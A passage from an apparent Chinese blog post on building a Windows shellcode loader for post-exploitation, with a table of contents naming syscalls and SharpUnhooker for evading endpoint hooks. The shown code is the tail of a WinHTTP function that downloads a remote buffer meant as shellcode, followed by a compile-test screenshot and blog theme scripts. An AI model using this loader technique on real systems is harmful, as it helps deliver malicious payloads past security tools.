class="line">	&#123;</span><br><span class="line">		<span class="keyword">do</span></span><br><span class="line">		&#123;</span><br><span class="line">			<span class="comment">// Check for available data.</span></span><br><span class="line">			dwSize = <span class="number">0</span>;</span><br><span class="line">			<span class="keyword">if</span> (!WinHttpQueryDataAvailable(hRequest, &amp;dwSize))</span><br><span class="line">			&#123;</span><br><span class="line">				printf(<span class="string">&quot;Error %u in WinHttpQueryDataAvailable.\n&quot;</span>, GetLastError());</span><br><span class="line"></span><br><span class="line">				<span class="keyword">break</span>;</span><br><span class="line">			&#125;</span><br><span class="line"></span><br><span class="line">			<span class="keyword">if</span> (!dwSize)</span><br><span class="line">				<span class="keyword">break</span>;</span><br><span class="line"></span><br><span class="line">			pszOutBuffer = <span class="keyword">new</span> <span class="keyword">char</span>[dwSize + <span class="number">1</span>];</span><br><span class="line"></span><br><span class="line">			<span class="keyword">if</span> (!pszOutBuffer)</span><br><span class="line">			&#123;</span><br><span class="line">				printf(<span class="string">&quot;Out of memory\n&quot;</span>);</span><br><span class="line">				<span class="keyword">break</span>;</span><br><span class="line">			&#125;</span><br><span class="line"></span><br><span class="line">			ZeroMemory(pszOutBuffer, dwSize + <span class="number">1</span>);</span><br><span class="line"></span><br><span class="line">			<span class="keyword">if</span> (!WinHttpReadData(hRequest, (LPVOID)pszOutBuffer, dwSize, &amp;dwDownloaded))</span><br><span class="line">			&#123;</span><br><span class="line">				printf(<span class="string">&quot;Error %u in WinHttpReadData.\n&quot;</span>, GetLastError());</span><br><span class="line">			&#125;</span><br><span class="line">			<span class="comment">//char ShellCode[1024];</span></span><br><span class="line">			<span class="comment">//strcpy(ShellCode,pszOutBuffer);</span></span><br><span class="line">			<span class="keyword">if</span> (!dwDownloaded)</span><br><span class="line">				<span class="keyword">break</span>;</span><br><span class="line">		&#125; <span class="keyword">while</span> (dwSize &gt; <span class="number">0</span>);</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="keyword">if</span> (hRequest) WinHttpCloseHandle(hRequest);</span><br><span class="line">	<span class="keyword">if</span> (hConnect) WinHttpCloseHandle(hConnect);</span><br><span class="line">	<span class="keyword">if</span> (hSession) WinHttpCloseHandle(hSession);</span><br><span class="line"></span><br><span class="line">	<span class="keyword">return</span> pszOutBuffer;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>编译测试<br><img src="/2021/12/29/Shellcode%E5%8A%A0%E8%BD%BD%E5%99%A8/../../../../photo/shellcodeloader/vt4.jpg" alt="edrhook"></p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/Windows/" rel="tag"><i class="fa fa-tag"></i> Windows</a>
          
            <a href="/tags/shellcode/" rel="tag"><i class="fa fa-tag"></i> shellcode</a>
          
            <a href="/tags/%E5%90%8E%E6%B8%97%E9%80%8F/" rel="tag"><i class="fa fa-tag"></i> 后渗透</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2021/03/08/%E5%9F%BA%E4%BA%8E%E6%9C%8D%E5%8A%A1%E7%9A%84%E6%A8%AA%E5%90%91%E6%B8%97%E9%80%8F%E5%AD%A6%E4%B9%A0/" rel="next" title="基于服务的横向渗透学习">
                <i class="fa fa-chevron-left"></i> 基于服务的横向渗透学习
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  
    <div class="comments" id="comments">
      
        <div id="gitment-container"></div>
      
    </div>

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Overview
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image"
                src="/images/test.png"
                alt="" />
            
              <p class="site-author-name" itemprop="name"></p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives">
              
                  <span class="site-state-item-count">3</span>
                  <span class="site-state-item-name">posts</span>
                </a>
              </div>
            

            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">3</span>
                  <span class="site-state-item-name">tags</span>
                </a>
              </div>
            

          </nav>

          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-4"><a class="nav-link" href="#ShellCode%E5%8A%A0%E8%BD%BD"><span class="nav-number">1.</span> <span class="nav-text">ShellCode加载</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%8A%A8%E6%80%81%E5%8A%A0%E8%BD%BD%E5%87%BD%E6%95%B0"><span class="nav-number">2.</span> <span class="nav-text">动态加载函数</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#syscalls"><span class="nav-number"></span> <span class="nav-text">syscalls</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#SharpUnhooker"><span class="nav-number">1.</span> <span class="nav-text">SharpUnhooker</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">SkyXuan</span>

  
</div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
          <span id="scrollpercent"><span>0</span>%</span>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  

  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (/json$/i.test(search_path)) {
      isXml = false;
    }
    var path = "/" + search_path;
    // monitor main search box;

    var onPopupClose = function (e) {
      $('.popup').hide();
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.search-popup-overlay').click(onPopupClose);
      $('.popup').toggle();
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }

    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';

      // start loading animation
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
          '<div id="search-loading-icon">' +
          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
          '</div>' +
          '</div>')
        .css('overflow', 'hidden');
      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');

      $.ajax({
        url: path,
        dataType: isXml ? "xml" : "json",
        async: true,
        success: function(res) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = isXml ? $("entry", res).map(function() {
            return {
              title: $("title", this).text(),
              content: $("content",this).text(),
              url: $("url" , this).text()
            };
          }).get() : res;
          var input = document.getElementById(search_id);
          var resultContent = document.getElementById(content_id);
          var inputEventFunction = function() {
            var searchText = input.value.trim().toLowerCase();
            var keywords = searchText.split(/[\s\-]+/);
            if (keywords.length > 1) {
              keywords.push(searchText);
            }
            var resultItems = [];
            if (searchText.length > 0) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var hitCount = 0;
                var searchTextCount = 0;
                var title = data.title.trim();
                var titleInLowerCase = title.toLowerCase();
                var content = data.content.trim().replace(/<[^>]+>/g,"");
                var contentInLowerCase = content.toLowerCase();
                var articleUrl = decodeURIComponent(data.url);
                var indexOfTitle = [];
                var indexOfContent = [];
                // only match articles with not empty titles
                if(title != '') {
                  keywords.forEach(function(keyword) {
                    function getIndexByWord(word, text, caseSensitive) {
                      var wordLen = word.length;
                      if (wordLen === 0) {
                        return [];
                      }
                      var startPosition = 0, position = [], index = [];
                      if (!caseSensitive) {
                        text = text.toLowerCase();
                        word = word.toLowerCase();
                      }
                      while ((position = text.indexOf(word, startPosition)) > -1) {
                        index.push({position: position, word: word});
                        startPosition = position + wordLen;
                      }
                      return index;
                    }

                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
                  });
                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
                    isMatch = true;
                    hitCount = indexOfTitle.length + indexOfContent.length;
                  }
                }

                // show search results

                if (isMatch) {
                  // sort index by position of keyword

                  [indexOfTitle, indexOfContent].forEach(function (index) {
                    index.sort(function (itemLeft, itemRight) {
                      if (itemRight.position !== itemLeft.position) {
                        return itemRight.position - itemLeft.position;
                      } else {
                        return itemLeft.word.length - itemRight.word.length;
                      }
                    });
                  });

                  // merge hits into slices

                  function mergeIntoSlice(text, start, end, index) {
                    var item = index[index.length - 1];
                    var position = item.position;
                    var word = item.word;
                    var hits = [];
                    var searchTextCountInSlice = 0;
                    while (position + word.length <= end && index.length != 0) {
                      if (word === searchText) {
                        searchTextCountInSlice++;
                      }
                      hits.push({position: position, length: word.length});
                      var wordEnd = position + word.length;

                      // move to next position of hit

                      index.pop();
                      while (index.length != 0) {
                        item = index[index.length - 1];
                        position = item.position;
                        word = item.word;
                        if (wordEnd > position) {
                          index.pop();
                        } else {
                          break;
                        }
                      }
                    }
                    searchTextCount += searchTextCountInSlice;
                    return {
                      hits: hits,
                      start: start,
                      end: end,
                      searchTextCount: searchTextCountInSlice
                    };
                  }

                  var slicesOfTitle = [];
                  if (indexOfTitle.length != 0) {
                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
                  }

                  var slicesOfContent = [];
                  while (indexOfContent.length != 0) {
                    var item = indexOfContent[indexOfContent.length - 1];
                    var position = item.position;
                    var word = item.word;
                    // cut out 100 characters
                    var start = position - 20;
                    var end = position + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if (end < position + word.length) {
                      end = position + word.length;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
                  }

                  // sort slices in content by search text's count and hits' count

                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                      return sliceRight.hits.length - sliceLeft.hits.length;
                    } else {
                      return sliceLeft.start - sliceRight.start;
                    }
                  });

                  // select top N slices in content

                  var upperBound = parseInt('1');
                  if (upperBound >= 0) {
                    slicesOfContent = slicesOfContent.slice(0, upperBound);
                  }

                  // highlight title and content

                  function highlightKeyword(text, slice) {
                    var result = '';
                    var prevEnd = slice.start;
                    slice.hits.forEach(function (hit) {
                      result += text.substring(prevEnd, hit.position);
                      var end = hit.position + hit.length;
                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                      prevEnd = end;
                    });
                    result += text.substring(prevEnd, slice.end);
                    return result;
                  }

                  var resultItem = '';

                  if (slicesOfTitle.length != 0) {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
                  } else {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
                  }

                  slicesOfContent.forEach(function (slice) {
                    resultItem += "<a href='" + articleUrl + "'>" +
                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
                      "...</p>" + "</a>";
                  });

                  resultItem += "</li>";
                  resultItems.push({
                    item: resultItem,
                    searchTextCount: searchTextCount,
                    hitCount: hitCount,
                    id: resultItems.length
                  });
                }
              })
            };
            if (keywords.length === 1 && keywords[0] === "") {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>'
            } else if (resultItems.length === 0) {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>'
            } else {
              resultItems.sort(function (resultLeft, resultRight) {
                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
                  return resultRight.searchTextCount - resultLeft.searchTextCount;
                } else if (resultLeft.hitCount !== resultRight.hitCount) {
                  return resultRight.hitCount - resultLeft.hitCount;
                } else {
                  return resultRight.id - resultLeft.id;
                }
              });
              var searchResultList = '<ul class=\"search-result-list\">';
              resultItems.forEach(function (result) {
                searchResultList += result.item;
              })
              searchResultList += "</ul>";
              resultContent.innerHTML = searchResultList;
            }
          }

          if ('auto' === 'auto') {
            input.addEventListener('input', inputEventFunction);
          } else {
            $('.search-icon').click(inputEventFunction);
            input.addEventListener('keypress', function (event) {
              if (event.keyCode === 13) {
                inputEventFunction();
              }
            });
          }

          // remove loading animation
          $(".local-search-pop-overlay").remove();
          $('body').css('overflow', '');

          proceedsearch();
        }
      });
    }

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function(e){
      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 &&
        $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });
  </script>





  

  

  

  
  

  

  

  

<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","tagMode":false,"log":false,"model":{"jsonPath":"/live2dw/assets/tororo.model.json"},"display":{"position":"right","width":150,"height":300},"mobile":{"show":true}});</script></body>
</html>
